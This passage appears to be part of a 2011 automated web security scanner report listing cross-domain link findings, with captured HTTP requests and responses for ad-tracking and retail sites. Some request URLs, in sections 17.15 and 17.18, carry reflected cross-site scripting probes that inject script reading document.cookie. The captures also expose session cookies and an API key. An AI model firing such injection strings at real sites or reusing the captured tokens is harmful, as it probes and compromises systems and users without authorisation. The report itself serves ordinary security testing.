Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:53:50 GMT
Expires: Mon, 16 May 2011 01:53:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2464

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzvisitlb_cs=1&betq=10736=418502" width = "1" height = "1" border = "0"><IMG SRC="http://bp.specificclick.net?pixid=99002087" width=0 height=0 border=0><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=helzlb_cs=1&betq=6391=391839" width = "1" height = "1" border = "0"><img src='http://pixel.mathtag.com/event/img?mt_id=101281&mt_adid=100230&v1=&v2=&v3=&s1=&s2=&s3=&ord=1475687857' width='1' height='1' />
<img height="1" width="1" src="http://view.atdmt.com/action/DPM_Helzberg_Homepage"/><img src="http://ads.bluelithium.com/pixel?id=601754&t=2" width="1" height="1" /><img src="https://ad.yieldmanager.com/pixel?id=628032&t=2" width="1" height="1" /><img src="http://ad.yieldmanager.com/pixel?id=634542&id=175865&id=410704&id=634247&t=2" width="1" height="1" />
<img src="http://ad.doubleclick.net/activity;src=2583709;type=helz1;cat=helzhp;ord=1;num=1475687857?" width=1 height=1 border=0>
<img src="http://action.mathtag.com/mm//HELZ//red?nm=helzHP&s0=&s1=&s2=&v0=&v1=&v2=&ri=1475687857" width="1" height="1" />
<img src="http://ads.adbrite.com/adserver/vdi/684339?d=110" height="1" width="1">
<img src="http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD0xNTc2ODAw&piggybackCookie=110" height="1" width="1">
<img src="http://tag.admeld.com/pixel?admeld_adprovider_id=296&_custom-rem=110&expiration=21days" height="1" width="1">
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1052618686/?label=r4HzCLaPpQEQvt_29QM&guid=ON&script=0"/>
</div>
</noscript><script src="http://action.media6degrees.com/orbserv/hbjs?pixId=5204&pcv=30" type="text/javascript"></script>
...[SNIP]...

17.12. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=1774243;type=trave073;cat=trave980;u3=tgdirect;u4=000329;u8=us_direct;u9=Live;ord=1;num=738394770305.6038?

The response contains the following links to other domains:

https://ad.yieldmanager.com/pixel?id=1209577&t=2
https://idcs.interclick.com/Segment.aspx?sid=ebfeaede-d45a-4e04-bc2f-e258bb5571d4
https://secure.media6degrees.com/orbserv/hbpix?pixId=3277
https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing
https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard
https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2
https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1022426391/?label=VBLKCKG-wwEQl_rD5wM&guid=ON&script=0
https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&guid=ON&script=0

Request

GET /activityi;src=1774243;type=trave073;cat=trave980;u3=tgdirect;u4=000329;u8=us_direct;u9=Live;ord=1;num=738394770305.6038? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.travelguard.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Mon, 16 May 2011 01:54:40 GMT
Expires: Mon, 16 May 2011 01:54:40 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 1893

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="https://idcs.interclick.com/Segment.aspx?sid=ebfeaede-d45a-4e04-bc2f-e258bb5571d4"/><img src="https://ad.yieldmanager.com/pixel?id=1209577&t=2" width="1" height="1" /><img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1033198129/?label=2_0xCJXK8gEQsbTV7AM&guid=ON&script=0"/><img src="https://tag.yieldoptimizer.com/ps/ps?t=i&p=1087&" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=1" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=2" width="1" height="1" />
<img src="https://tag.yieldoptimizer.com/ps/sync?t=i&p=1087&w=true&r=3" width="1" height="1" /><script type="text/javascript">
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1022426391/?label=VBLKCKG-wwEQl_rD5wM&guid=ON&script=0"/>
</div>
</noscript><img width="1" height="1" src="https://secure.media6degrees.com/orbserv/hbpix?pixId=3277" /><img src="https://securetags.w55c.net/rs?id=f41f7ddceca24ce884b754560c63aed4&t=marketing" />
<img height="1" width="1" style="border-style:none;" alt="" src="https://seg.sharethis.com/socialOptimizationPixel.php?campaign=RT-travel_guard"/></body>
...[SNIP]...

17.13. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The page was loaded from a URL containing a query string:

http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527?

The response contains the following links to other domains:

http://a.tribalfusion.com/i.cid?c=294813&d=30&page=landingPage
http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=A55F91532C5B5ECBD7EA17754C90B7F6&rsi_site=321B4F74F24F8AB84A6B7335C286B21E&rsi_event=BE74CE476C51EE46644ACD25F8AFAFD4
http://bp.specificclick.net/?pixid=99007235
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=tosh_cs=1&betq=7046=395215
http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=toshiba_cs=1&betq=11505=422668
http://media.fastclick.net/w/tre?ad_id=20480;evt=12869;cat1=14057;cat2=14058
http://r.turn.com/r/beacon?b2=Z6z3HD7Ka9PFm_lTPlcJyUlQ-yO37BfURcbb7BumEMQAutjTrrs_D_o0Lv3V9pAvJVMIOj2uDziSnc27IJcNQA&cid=
http://switch.atdmt.com/action/Toshiba_Homepage
http://www.burstnet.com/enlightn/5562/F24E/

Request

GET /activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9342936133034.527? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.toshibadirect.com/td/b2c/laptops.to?page=segHHO
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

17.14. http://hire.jobvite.com/CompanyJobs/Careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qlZ9Vfw8

The response contains the following links to other domains:

http://investor.bluenile.com/images/NSDQ.jpg
http://investor.bluenile.com/images/PP.jpg
http://investor.bluenile.com/images/billme.jpg
http://investor.bluenile.com/images/bizRate.jpg
http://investor.bluenile.com/images/bug_facebook_16x16.jpg
http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif
http://investor.bluenile.com/images/item_icon_ca_flag_shad.gif
http://investor.bluenile.com/images/item_icon_gbr_flag_shad.gif
http://investor.bluenile.com/images/item_icon_us_flag_shad.gif
http://investor.bluenile.com/images/logo2.jpg
http://investor.bluenile.com/images/verisign.jpg
http://pics.bluenile.com/1166193570/bundles/core.js
http://pics.bluenile.com/1495474762/js/navigation_flyouts_menu.js
http://pics.bluenile.com/1675544779/bundles/allpages.css
http://pics.bluenile.com/442036000/js/ga.js
http://pics.bluenile.com/N877218625/bundles/allpages.js
http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&symbol=NILE&selected=NILE
http://www.bbbonline.org/cks.asp?id=1296000087
http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html
http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38
http://www.bluenile.co.uk/default.jsp?curr=GBP&pre_context=37
http://www.bluenile.com/
http://www.bluenile.com/about-blue-nile
http://www.bluenile.com/blue-nile-awards
http://www.bluenile.com/blue-nile-in-the-news
http://www.bluenile.com/blue-nile-quality-value
http://www.bluenile.com/contact-blue-nile
http://www.bluenile.com/default.jsp
http://www.bluenile.com/default.jsp?curr=USD&pre_context=53
http://www.bluenile.com/diamonds
http://www.bluenile.com/engagement-rings
http://www.bluenile.com/favicon.ico
http://www.bluenile.com/jewelry-appraisal
http://www.bluenile.com/jobs_channel.jsp
http://www.bluenile.com/packaging.jsp
http://www.bluenile.com/paypal.jsp
http://www.bluenile.com/privacy.jsp
http://www.bluenile.com/product_policies.jsp
http://www.bluenile.com/returns.jsp
http://www.bluenile.com/services.jsp
http://www.bluenile.com/services_channel.jsp
http://www.bluenile.com/shipping.jsp
http://www.bluenile.com/sitemap
http://www.bluenile.com/sweepstakes.jsp
http://www.bluenile.com/where_we_ship.jsp
http://www.facebook.com/pages/Blue-Nile/5873063513?v=wall
http://www.linkedin.com/companyInsider?script&useBorder=no
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.BLUENILE.com&lang=en
https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=am2qlgznv2utc045d0xr1hr3; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: guestidc=5ca2bcbf-4c16-4cf2-b0d2-57e62d1c65f1; expires=Wed, 15-Jun-2011 10:22:19 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 10:22:19 GMT
Content-Length: 40128

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link href="http://hir
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.linkedin.com/companyInsider?script&useBorder=no"></script>
...[SNIP]...
</TITLE>
<base href="http://www.bluenile.com" />
<link rel="shortcut icon" href="http://www.bluenile.com/favicon.ico" />
<meta name="description" content="Career opportunities are listed by department."/>
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8"/>

   <link rel="stylesheet" type="text/css" media="screen, print" href="http://pics.bluenile.com/1675544779/bundles/allpages.css" />

<script type="text/javascript" src="http://pics.bluenile.com/1166193570/bundles/core.js" ></script>

<script type="text/javascript" src="http://pics.bluenile.com/442036000/js/ga.js" ></script>
...[SNIP]...
</div>

                   <script type="text/javascript" src="http://pics.bluenile.com/N877218625/bundles/allpages.js" ></script>


   <script type="text/javascript" src="http://pics.bluenile.com/1495474762/js/navigation_flyouts_menu.js" ></script>
...[SNIP]...
<div class="breadcrumbs"><A HREF="http://www.bluenile.com/default.jsp">Home</A> > <A HREF="http://www.bluenile.com/about-blue-nile"><div class="breadcrumb">
...[SNIP]...
<br />
Blue Nile, Inc. is the leading online retailer of <a href="http://www.bluenile.com/diamonds" target="_blank">diamonds</a> and fine jewelry. The Company delivers the ultimate customer experience, providing consumers with a superior way to buy <a href="http://www.bluenile.com/engagement-rings" target="_blank">engagement rings</a>
...[SNIP]...
<div class="column first">
                   <a href="http://www.bluenile.com/where_we_ship.jsp" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<div class="footer_flag_icon">
                       <a href="http://www.bluenile.com/default.jsp?curr=USD&pre_context=53">
                           <img width="26" height="17" align="absmiddle" border="0" src="http://investor.bluenile.com/images/item_icon_us_flag_shad.gif"></a>
...[SNIP]...
<div class="footer_flag_icon">
                       <a href="http://www.bluenile.ca/default.jsp?curr=CAD&pre_context=38">
                           <img width="26" height="17" align="absmiddle" border="0" src="http://investor.bluenile.com/images/item_icon_ca_flag_shad.gif"></a>
...[SNIP]...
<div class="footer_flag_icon">
                       <a href="http://www.bluenile.co.uk/default.jsp?curr=GBP&pre_context=37">
                           <img width="26" height="17" align="absmiddle" border="0" src="http://investor.bluenile.com/images/item_icon_gbr_flag_shad.gif"></a>
...[SNIP]...
<div class="column">
                   <a href="http://www.bluenile.com/about-blue-nile" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<li><a href="http://www.bluenile.com/jobs_channel.jsp">Careers</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/blue-nile-quality-value">Quality & Value</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/sitemap">Site Map</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/blue-nile-in-the-news">In the News</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/blue-nile-awards">Awards & Reviews</a>
...[SNIP]...
<div class="column">
                   <a href="http://www.bluenile.com/services.jsp" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<li><a href="http://www.bluenile.com/shipping.jsp">Free FedEx® Shipping</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/packaging.jsp">Free Gift Packaging</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/returns.jsp">30-Day Returns</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/jewelry-appraisal">Jewelry Appraisals</a>
...[SNIP]...
<li><a href="http://www.bluenile.com/services_channel.jsp">Financing & Insurance</a>
...[SNIP]...
<div class="column">
                   <a href="http://www.bluenile.com/contact-blue-nile" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<div class="column last">
                   <a href="http://www.bluenile.com/sweepstakes.jsp" class="title">
                       <span class="text">
...[SNIP]...
<span class="image"><img width="10" height="10" src="http://investor.bluenile.com/images/but_arrow_shad_sm_10x10.gif"></span>
...[SNIP]...
<div class="vat">
                   <a href="http://www.facebook.com/pages/Blue-Nile/5873063513?v=wall"><img width="16" height="16" src="http://investor.bluenile.com/images/bug_facebook_16x16.jpg"></a>
                   <a href="http://www.facebook.com/pages/Blue-Nile/5873063513?v=wall"><font style="color: rgb(0, 102, 153); font-weight: 900;">
...[SNIP]...
<p>© 1999-2010, Blue Nile, Inc.<a href="http://www.bluenile.com/privacy.jsp">Privacy Policy</a>
       <a href="http://www.bluenile.com/product_policies.jsp">Terms and Conditions</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.bluenile.com/paypal.jsp"><img width="59" height="23" alt="PayPal" src="http://investor.bluenile.com/images/PP.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.bbbonline.org/cks.asp?id=1296000087"><img width="20" height="35" alt="BBB" src="http://investor.bluenile.com/images/logo2.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.bizrate.com/ratings_guide/merchant_detail__mid--24298.html"><img width="87" height="44" alt="Biz Rate 2009" src="http://investor.bluenile.com/images/bizRate.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="http://quotes.nasdaq.com/asp/summaryquote.asp?mode=stock&symbol=NILE&selected=NILE"><img width="70" height="36" alt="Nasdaq" src="http://investor.bluenile.com/images/NSDQ.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=SECURE.BLUENILE.com&lang=en"><img width="53" height="34" alt="Verisign" src="http://investor.bluenile.com/images/verisign.jpg"></a>
...[SNIP]...
<li><a rel="nofollow" href="https://www.securecheckout.billmelater.com/paycapture-content/fetch?hash=PAP288AN&content=/bmlweb/np90drollingiw.html"><img width="64" height="39" alt="Bill Me Later" src="http://investor.bluenile.com/images/billme.jpg"></a>
...[SNIP]...

17.15. http://html.aggregateknowledge.com/iframe previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://html.aggregateknowledge.com
Path:	/iframe

Issue detail

The page was loaded from a URL containing a query string:

http://html.aggregateknowledge.com/iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1&senduuid=1

The response contains the following link to another domain:

http://www.gnc.com/recommendationpixel/user.jsp?uid=1096126108310753991

Request

GET /iframe?wid=2&xwid=GNC&uniqueURL=http://www.gnc.com/cmsTemplates/gnc_09_home_1v1.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1&senduuid=1 HTTP/1.1
Host: html.aggregateknowledge.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp?c5205--%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3Ebb446d17c91=1
Cookie: uuid=1096126108310753991; u=5|0AARbQzAAABAABAIAEOFTAAAAIAANABDhUwAAACAADQ%3D%3D

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=1096126108310753991; Version=1; Domain=.aggregateknowledge.com; Max-Age=157680000; Expires=Sat, 14-May-2016 10:57:24 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=5|0AQRbQzEAABAABQIAEOFTAAAAIAANABDhUwAAACAADQEAAQEAgA%3D%3D; Version=1; Domain=.aggregateknowledge.com; Max-Age=63072000; Expires=Wed, 15-May-2013 10:57:24 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 402
Date: Mon, 16 May 2011 10:57:24 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>
<head>
<meta http-equiv="pragma" content="no-cache">
</head>

<body style="border: 0; margin: 0; padding: 0;">

<img src=http://www.gnc.com/recommendationpixel/user.jsp?uid=1096126108310753991 height=1 width=1/>

</body>
...[SNIP]...

17.16. https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.homedepot.ca
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The page was loaded from a URL containing a query string:

https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm?langId=-15&storeId=10051&catalogId=10051&new=Y

The response contains the following links to other domains:

https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js
https://www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1

Request

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Mon, 16 May 2011 02:10:38 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: WCS_UNIQUE_ID=HCa6Eud8L9hN21YyVUS%2bHaSDQgY%3d%0a; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_ACTIVESTOREDATA=%2d15%2c10051; Path=/; Domain=.homedepot.ca
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2crW6rzz%2fYGsIblj6FaaWMw7l8O7Y%3d; Path=/; Domain=.homedepot.ca; Secure
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2c%2d15%2cCAD%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b10051%7c10501%7c10501%7cnull%7c%2d2000%5d%2cSPiv6UKbre34gGrW2piYfWv44EQ%3d; Path=/; Domain=.homedepot.ca
Set-Cookie: JSESSIONID=0001VzTy5fzfDUHAYcFBVD3sOyb:-4C1Q63; Path=/
Cache-Control: no-store, no-cache
Expires: 0
Pragma: no-cache
Content-Length: 75346

       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
...[SNIP]...


       <script language="JavaScript" type="text/javascript" src="https://sadmin.brightcove.com/js/BrightcoveExperiences_all.js"></script>
...[SNIP]...
</script>


       <script src="//www.mapquestapi.com/sdk/js/v6.0.0/mqa.toolkit.js?key=Gmjtd%7Clu6tn16zng%2C20%3Do5-lw2a1"></script>
...[SNIP]...

17.17. https://secure.orientaltrading.com/ui/userProfile/processRequest.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://secure.orientaltrading.com
Path:	/ui/userProfile/processRequest.do

Issue detail

The page was loaded from a URL containing a query string:

https://secure.orientaltrading.com/ui/userProfile/processRequest.do?requestURI=displayLogin

The response contains the following links to other domains:

https://images.scanalert.com/meter/www.orientaltrading.com/55.gif
https://www.googleadservices.com/pagead/conversion.js
https://www.googleadservices.com/pagead/conversion/1072605278/?label=NzSYCP3Q5QEQ3tC6_wM&guid=ON&script=0

Request

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:16:41 GMT
Server: Apache
Set-Cookie: JSESSIONID=LSR0NQ5JncTchv2GrGWHyGDfvFpDKhs5c5ThHL92VQvcmKBTQLms!-2120161015; domain=.orientaltrading.com; path=/; HttpOnly
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=30
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 85683

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

...[SNIP]...
<a onclick="window.open('https://www.mcafeesecure.com/RatingVerify?ref=www.orientaltrading.com','mcafee','width=550, height=450,resizable,scrollbars=yes'); return false;" href="javascript: void(0)"><img width="65" height="37" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" src="//images.scanalert.com/meter/www.orientaltrading.com/55.gif"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1072605278/?label=NzSYCP3Q5QEQ3tC6_wM&guid=ON&script=0"/>
</div>
...[SNIP]...

17.18. http://t.p.mybuys.com/webrec/wr.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.p.mybuys.com
Path:	/webrec/wr.do

Issue detail

The page was loaded from a URL containing a query string:

http://t.p.mybuys.com/webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=2f479%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef3b7e714c62&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510843775&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do

The response contains the following link to another domain:

http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=2f479

Request

GET /webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=2f479%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef3b7e714c62&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510843775&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do HTTP/1.1
Host: t.p.mybuys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: JSESSIONID=8E961945455EB2FBD923D2E9DDFEFCDF; mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:05:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=sOgnt6NbgmSE4h1NwgmFVV1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 03-Jun-2079 14:19:11 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 512

<html>
<body>
<iframe width="0" height="0" frameborder="0" id="mbadn" scrolling="no" style="display: none;" src="http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=2f479"><script>al
...[SNIP]...

17.19. http://t.p.mybuys.com/webrec/wr.do previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t.p.mybuys.com
Path:	/webrec/wr.do

Issue detail

The page was loaded from a URL containing a query string:

http://t.p.mybuys.com/webrec/wr.do?client=ARMANIEXCHANGE&sessionId=6451B347-829F-5F10-0394-7AA048201BB1&pt=hcat&categoryname=Womens&ckc=100199&mbcc=736A768E-F798-53C9-B056-8FE338824CC8&lang=en&v=4.7.3&mbts=1305510850857&purl=http%3A%2F%2Fwww.armaniexchange.com%2Fcategory%2Fwomens.do

The response contains the following link to another domain:

http://adserver.veruta.com/track.fcgi?merchantid=854445219&category=100199&itemid=&eventid=0&ifmode=1&recommend=%7B%22dc%22%3A%224699979325968%22%2C%22slc%22%3A14%2C%22extra%22%3A%7B%22cl%22%3A%22ARMANIEXCHANGE%22%2C%22cm%22%3A%2220772879917%22%2C%22ts%22%3A%2221758514%22%7D%2C%22rc%22%3A%5B%221849367843%22%2C%2222084645718%22%2C%221849367842%22%2C%2222084642104%22%2C%2219522266448%22%2C%2222084646129%22%2C%2222084645710%22%2C%2222084645561%22%2C%2222084645689%22%2C%2220952419112%22%2C%2219779857694%22%2C%2223186672305%22%2C%2220399498260%22%2C%2220796345994%22%2C%2220796346228%22%2C%2220796346434%22%2C%2219522267016%22%2C%2220796346298%22%2C%2220796346442%22%2C%2219522266459%22%5D%7D

Request

